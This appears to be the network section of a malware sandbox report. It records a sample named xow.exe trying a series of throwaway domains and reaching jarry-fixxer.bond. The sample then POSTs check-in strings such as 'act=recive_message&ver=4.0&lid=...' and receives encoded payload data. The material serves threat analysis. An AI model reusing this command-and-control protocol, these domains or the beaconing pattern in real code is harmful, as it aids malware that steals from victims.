Jan 22, 2025 12:24:04.583379984 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.583386898 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.951698065 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.951811075 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.951899052 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.955858946 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.955890894 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:05.451807976 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:05.451992035 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:05.453774929 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:05.453790903 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:05.454024076 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:05.455363989 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:05.455604076 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:05.455627918 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:05.455689907 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:05.455698967 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:14.411871910 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:14.412143946 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:14.412236929 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:14.412333012 CET	49733	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:14.412379026 CET	443	49733	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:14.446960926 CET	49734	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:14.446997881 CET	443	49734	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:14.447123051 CET	49734	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:14.447547913 CET	49734	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:14.447562933 CET	443	49734	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:14.917758942 CET	443	49734	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:14.917836905 CET	49734	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:14.921087027 CET	49734	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:14.921098948 CET	443	49734	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:14.921504974 CET	443	49734	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:14.923510075 CET	49734	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:14.923734903 CET	49734	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:14.923774958 CET	443	49734	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:15.676762104 CET	443	49734	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:15.677021980 CET	443	49734	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:15.677084923 CET	49734	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:15.679151058 CET	49734	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:15.679168940 CET	443	49734	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:15.910979033 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:15.911024094 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:15.911166906 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:15.911911011 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:15.911926985 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:16.563819885 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:16.563940048 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:16.567687035 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:16.567738056 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:16.568017960 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:16.569401979 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:16.569562912 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:16.569607973 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:16.569747925 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:16.569772005 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:17.186228991 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:17.186400890 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:17.186461926 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:17.186655045 CET	49735	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:17.186678886 CET	443	49735	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:17.451545954 CET	49737	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:17.451602936 CET	443	49737	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:17.451749086 CET	49737	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:17.452353954 CET	49737	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:17.452377081 CET	443	49737	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:18.778788090 CET	443	49737	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:18.778898001 CET	49737	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:18.780836105 CET	49737	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:18.780850887 CET	443	49737	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:18.781222105 CET	443	49737	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:18.783169031 CET	49737	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:18.783842087 CET	49737	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:18.783884048 CET	443	49737	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:20.280122042 CET	443	49737	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:20.280380964 CET	443	49737	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:20.280445099 CET	49737	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:20.280636072 CET	49737	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:20.280654907 CET	443	49737	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:20.626671076 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:20.626720905 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:20.626796007 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:20.627161980 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:20.627175093 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.106595993 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.106698036 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.108022928 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.108055115 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.109009027 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.121191025 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.122353077 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.122492075 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.122750998 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.122828960 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.122977972 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.123147964 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.123352051 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.123411894 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.123642921 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.123708010 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.124010086 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.124063015 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.124089956 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.124203920 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.124264002 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.131783009 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.132044077 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.132152081 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.132193089 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.132236958 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.132332087 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.132389069 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.132442951 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.134097099 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:21.134226084 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:21.134306908 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:22.953742981 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:22.953994989 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:22.954071045 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:22.954174995 CET	49742	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:22.954210043 CET	443	49742	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:22.971482992 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:22.971524954 CET	443	49744	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:22.971604109 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:22.972124100 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:22.972143888 CET	443	49744	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:23.479396105 CET	443	49744	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:23.479506016 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:23.482763052 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:23.482774973 CET	443	49744	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:23.483649015 CET	443	49744	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:23.491571903 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:23.491815090 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:23.491849899 CET	443	49744	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:23.998944998 CET	443	49744	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:23.999200106 CET	443	49744	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:23.999258041 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:24.000330925 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:24.000340939 CET	443	49744	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:24.000415087 CET	49744	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:24.000421047 CET	443	49744	104.21.78.5	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2025 12:24:01.148974895 CET	64898	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:24:01.158783913 CET	53	64898	1.1.1.1	192.168.2.4
Jan 22, 2025 12:24:01.162265062 CET	53887	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:24:01.171916008 CET	53	53887	1.1.1.1	192.168.2.4
Jan 22, 2025 12:24:01.174972057 CET	55507	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:24:01.184338093 CET	53	55507	1.1.1.1	192.168.2.4
Jan 22, 2025 12:24:01.187408924 CET	51568	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:24:01.197791100 CET	53	51568	1.1.1.1	192.168.2.4
Jan 22, 2025 12:24:01.200231075 CET	50141	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:24:01.209727049 CET	53	50141	1.1.1.1	192.168.2.4
Jan 22, 2025 12:24:01.212260008 CET	54397	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:24:01.221498966 CET	53	54397	1.1.1.1	192.168.2.4
Jan 22, 2025 12:24:01.222829103 CET	58897	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:24:01.235096931 CET	53	58897	1.1.1.1	192.168.2.4
Jan 22, 2025 12:24:01.238348961 CET	58618	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:24:01.247375965 CET	53	58618	1.1.1.1	192.168.2.4
Jan 22, 2025 12:24:01.250344038 CET	65226	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:24:01.263449907 CET	53	65226	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 22, 2025 12:24:01.148974895 CET	192.168.2.4	1.1.1.1	0xd36a	Standard query (0)	longingfluffyr.cyou	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.162265062 CET	192.168.2.4	1.1.1.1	0xcedd	Standard query (0)	strivehelpeu.bond	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.174972057 CET	192.168.2.4	1.1.1.1	0x5fac	Standard query (0)	crookedfoshe.bond	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.187408924 CET	192.168.2.4	1.1.1.1	0x3447	Standard query (0)	immolatechallen.bond	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.200231075 CET	192.168.2.4	1.1.1.1	0xabd9	Standard query (0)	stripedre-lot.bond	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.212260008 CET	192.168.2.4	1.1.1.1	0x1fd2	Standard query (0)	growthselec.bond	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.222829103 CET	192.168.2.4	1.1.1.1	0x8ef2	Standard query (0)	jarry-deatile.bond	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.238348961 CET	192.168.2.4	1.1.1.1	0xa295	Standard query (0)	pain-temper.bond	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.250344038 CET	192.168.2.4	1.1.1.1	0xb109	Standard query (0)	jarry-fixxer.bond	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 22, 2025 12:24:01.158783913 CET	1.1.1.1	192.168.2.4	0xd36a	Name error (3)	longingfluffyr.cyou	none	none	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.171916008 CET	1.1.1.1	192.168.2.4	0xcedd	Name error (3)	strivehelpeu.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.184338093 CET	1.1.1.1	192.168.2.4	0x5fac	Name error (3)	crookedfoshe.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.197791100 CET	1.1.1.1	192.168.2.4	0x3447	Name error (3)	immolatechallen.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.209727049 CET	1.1.1.1	192.168.2.4	0xabd9	Name error (3)	stripedre-lot.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.221498966 CET	1.1.1.1	192.168.2.4	0x1fd2	Name error (3)	growthselec.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.235096931 CET	1.1.1.1	192.168.2.4	0x8ef2	Name error (3)	jarry-deatile.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.247375965 CET	1.1.1.1	192.168.2.4	0xa295	Name error (3)	pain-temper.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.263449907 CET	1.1.1.1	192.168.2.4	0xb109	No error (0)	jarry-fixxer.bond		104.21.78.5	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:24:01.263449907 CET	1.1.1.1	192.168.2.4	0xb109	No error (0)	jarry-fixxer.bond		172.67.214.67	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jarry-fixxer.bond

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	104.21.78.5	443	7392	C:\Users\user\Desktop\xow.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:24:02 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: jarry-fixxer.bond
2025-01-22 11:24:02 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-22 11:24:02 UTC	1126	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:24:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eqkgfbc3t5k4j0gvi2m6s6s4ua; expires=Sun, 18 May 2025 05:10:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYVTuNGBRhH1zn%2BgKfQhVwif9n03csyVgyam5f5AZJ5uRyX10OucSyrSkXhW3SJbp0iCFImmyPXKF75ht4uqA8CvJ6mbJnIGfTFWPpgpmN3Xs7YCRQa2agtjOc5qX9n9TBPSug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 905f2ce39deec1f4-DUB alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=93645&min_rtt=93619&rtt_var=35126&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=908&delivery_rate=31190&cwnd=32&unsent_bytes=0&cid=7f00b181f504eb70&ts=971&x=0"
2025-01-22 11:24:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-22 11:24:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.78.5	443	7392	C:\Users\user\Desktop\xow.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:24:03 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: jarry-fixxer.bond
2025-01-22 11:24:03 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 52 49 49 49 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--RIII&j=
2025-01-22 11:24:04 UTC	1136	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:24:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m1mf6mtrjl8mq7rdn1mmpp9ubi; expires=Sun, 18 May 2025 05:10:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LNF%2BxsprWS5A5%2BahtFJm79lq5yZwHEok6b0aKapdJDOC%2FjGnldZgvnDv8S%2Fm0Nqi50Hd%2BDW2Q2GXCh%2FBhhqeXDMVAxyr3CS1b4eNG5mHZLSxe5mrQKbh3Y4VfBCeuoTelm6pyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 905f2ceb7ff5752f-SEA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=70732&min_rtt=70669&rtt_var=26546&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=947&delivery_rate=41319&cwnd=32&unsent_bytes=0&cid=632a318920f4d170&ts=981&x=0"
2025-01-22 11:24:04 UTC	233	IN	Data Raw: 63 35 36 0d 0a 45 42 78 47 70 52 33 39 54 36 6f 52 4d 6a 74 42 75 6e 62 77 55 62 30 71 2b 61 30 70 53 77 79 6a 4d 61 6e 59 33 6c 4c 73 76 45 42 72 50 6a 43 48 4a 38 6c 6a 69 47 4a 58 47 58 76 4f 42 49 55 30 6b 51 69 59 79 51 74 78 61 73 4a 64 32 72 33 79 63 4a 72 52 59 69 70 36 4a 38 6c 75 6d 47 4f 49 64 45 6f 5a 65 2b 45 4e 30 6a 54 54 43 4d 4f 50 54 43 46 75 77 6c 33 4c 75 62 55 39 6e 4e 41 6a 65 48 41 68 7a 58 69 65 4b 38 74 39 58 31 34 6b 33 78 65 61 50 39 52 48 6b 63 41 4c 5a 79 37 47 53 34 76 69 2f 42 2b 4a 79 43 46 64 66 54 58 4f 50 34 42 6a 30 54 4e 58 56 57 4f 41 56 4a 45 30 33 30 61 66 79 55 49 6a 5a 4d 74 56 79 72 79 30 49 6f 58 61 4b 48 68 2b 49 73 78 79 6c 7a 2f 47 64 31 68 56 Data Ascii: c56EBxGpR39T6oRMjtBunbwUb0q+a0pSwyjManY3lLsvEBrPjCHJ8ljiGJXGXvOBIU0kQiYyQtxasJd2r3ycJrRYip6J8lumGOIdEoZe+EN0jTTCMOPTCFuwl3LubU9nNAjeHAhzXieK8t9X14k3xeaP9RHkcALZy7GS4vi/B+JyCFdfTXOP4Bj0TNXVWOAVJE030afyUIjZMtVyry0IoXaKHh+Isxylz/Gd1hV
2025-01-22 11:24:04 UTC	1369	IN	Data Raw: 49 74 55 58 30 6e 32 66 54 34 4f 50 45 32 6b 39 38 31 44 61 71 36 6b 39 6e 74 68 69 62 54 41 39 68 33 69 54 62 5a 41 7a 57 46 55 74 33 52 65 64 4e 4e 35 49 69 63 42 4c 4b 6d 62 4a 56 38 47 31 73 7a 2b 41 31 43 56 36 64 79 50 49 65 4a 63 72 78 33 41 51 46 32 50 66 44 4e 4a 72 6e 32 69 4c 7a 45 67 39 59 39 41 54 31 50 53 6c 63 49 6e 53 59 69 6f 2b 49 73 6c 2b 6b 69 33 61 65 31 74 53 4a 73 6f 66 6d 7a 37 53 53 4a 62 46 52 43 70 75 78 6c 6e 42 74 62 59 30 67 39 4d 6b 63 6e 35 6b 69 54 2b 59 4e 59 67 72 45 48 6f 6d 79 42 4f 65 4a 5a 31 79 32 39 41 46 4d 43 37 47 58 34 76 69 2f 44 69 4c 33 53 46 35 63 53 66 50 64 49 30 74 32 6e 56 64 58 44 48 65 45 5a 77 35 33 46 71 52 77 55 30 71 5a 38 70 61 7a 72 32 34 63 4d 43 65 4a 57 6f 2b 66 49 64 65 6b 69 62 45 65 55 64 Data Ascii: ItUX0n2fT4OPE2k981Daq6k9nthibTA9h3iTbZAzWFUt3RedNN5IicBLKmbJV8G1sz+A1CV6dyPIeJcrx3AQF2PfDNJrn2iLzEg9Y9AT1PSlcInSYio+Isl+ki3ae1tSJsofmz7SSJbFRCpuxlnBtbY0g9Mkcn5kiT+YNYgrEHomyBOeJZ1y29AFMC7GX4vi/DiL3SF5cSfPdI0t2nVdXDHeEZw53FqRwU0qZ8pazr24cMCeJWo+fIdekibEeUd
2025-01-22 11:24:04 UTC	1369	IN	Data Raw: 6f 41 7a 30 31 71 58 78 55 30 6d 59 38 30 54 68 66 71 37 4b 4d 36 47 59 6c 68 39 4d 4d 52 31 33 52 6a 4c 66 56 35 65 4e 5a 67 4c 33 43 71 66 54 35 65 50 45 32 6c 6a 77 46 76 4e 71 4c 4d 39 6a 64 41 73 66 58 73 72 7a 33 2b 66 49 4d 31 33 57 31 49 67 31 52 43 41 4f 64 39 41 6e 73 35 42 49 79 36 50 45 38 79 69 2f 47 6a 4f 37 7a 56 35 50 42 48 45 63 5a 45 71 33 6a 4e 50 46 7a 71 59 45 35 35 7a 68 77 69 57 78 30 34 73 59 63 42 5a 78 62 2b 32 50 49 62 51 49 57 42 78 49 4d 64 7a 6c 79 66 46 66 56 52 52 4b 74 4d 66 6c 44 50 65 51 74 75 42 43 79 35 32 67 51 75 4c 6a 72 73 38 67 39 46 67 52 33 30 71 79 58 69 4a 62 64 63 39 53 52 6b 6b 31 46 54 4b 63 39 4e 42 6d 38 52 42 4c 57 37 47 58 73 36 35 75 7a 4f 44 32 53 68 38 65 53 44 4c 64 70 49 72 79 48 52 55 58 44 48 64 Data Ascii: oAz01qXxU0mY80Thfq7KM6GYlh9MMR13RjLfV5eNZgL3CqfT5ePE2ljwFvNqLM9jdAsfXsrz3+fIM13W1Ig1RCAOd9Ans5BIy6PE8yi/GjO7zV5PBHEcZEq3jNPFzqYE55zhwiWx04sYcBZxb+2PIbQIWBxIMdzlyfFfVRRKtMflDPeQtuBCy52gQuLjrs8g9FgR30qyXiJbdc9SRkk1FTKc9NBm8RBLW7GXs65uzOD2Sh8eSDLdpIryHRUXDHd
2025-01-22 11:24:04 UTC	194	IN	Data Raw: 52 39 6c 64 6b 4c 4e 69 44 59 45 38 79 32 2f 47 6a 4f 31 79 74 67 63 43 72 4f 63 70 6b 6c 7a 33 31 64 55 69 58 54 45 35 55 31 30 6b 43 57 79 6b 67 6f 61 73 74 42 79 4c 47 32 50 59 53 65 62 44 4a 35 50 49 63 6e 33 77 72 45 57 6b 42 43 4d 63 35 55 6a 58 33 47 43 4a 7a 44 43 33 45 75 77 6c 7a 43 74 62 51 34 67 64 45 6d 66 48 67 69 79 6e 71 51 4a 39 70 37 58 6c 51 6f 31 78 2b 41 4d 39 4a 4d 6c 38 74 44 49 6d 53 42 48 59 75 39 70 48 44 57 6e 68 64 2f 63 53 54 45 61 64 38 79 68 6d 6f 51 58 69 2b 59 54 4e 49 2f 30 55 69 55 77 30 63 69 5a 73 42 66 78 62 32 35 4f 59 62 57 4d 48 0d 0a Data Ascii: R9ldkLNiDYE8y2/GjO1ytgcCrOcpklz31dUiXTE5U10kCWykgoastByLG2PYSebDJ5PIcn3wrEWkBCMc5UjX3GCJzDC3EuwlzCtbQ4gdEmfHgiynqQJ9p7XlQo1x+AM9JMl8tDImSBHYu9pHDWnhd/cSTEad8yhmoQXi+YTNI/0UiUw0ciZsBfxb25OYbWMH
2025-01-22 11:24:04 UTC	1369	IN	Data Raw: 33 64 33 65 0d 0a 4e 36 4c 4d 5a 78 6b 43 7a 4d 64 6c 56 64 4a 4e 77 53 6e 58 4f 52 43 4a 7a 58 43 33 45 75 37 6e 54 2b 2b 4a 30 4b 7a 73 46 73 61 7a 34 6a 79 7a 2f 48 62 63 52 77 58 46 45 73 33 68 32 65 4f 64 5a 44 6c 38 52 50 4a 57 66 45 56 63 71 2f 75 54 47 4b 30 69 68 30 66 53 66 49 63 4a 41 6c 69 44 30 51 58 6a 75 59 54 4e 49 57 79 45 4f 56 79 51 73 32 49 4e 67 54 7a 4c 62 38 61 4d 37 53 4b 33 52 34 49 63 74 2b 6d 53 58 4e 65 31 52 59 4a 64 34 58 6e 54 66 61 53 5a 54 4c 52 79 64 6b 77 46 4c 48 73 62 4d 37 69 35 35 73 4d 6e 6b 38 68 79 66 66 48 4d 74 6c 52 30 6b 76 6d 41 76 63 4b 70 39 50 6c 34 38 54 61 57 2f 54 57 63 47 30 75 54 2b 4c 33 53 31 31 63 79 4c 4c 64 5a 59 6c 7a 6e 78 5a 53 79 44 55 47 70 55 39 30 30 61 57 78 55 67 6b 4c 6f 38 54 7a 4b 4c Data Ascii: 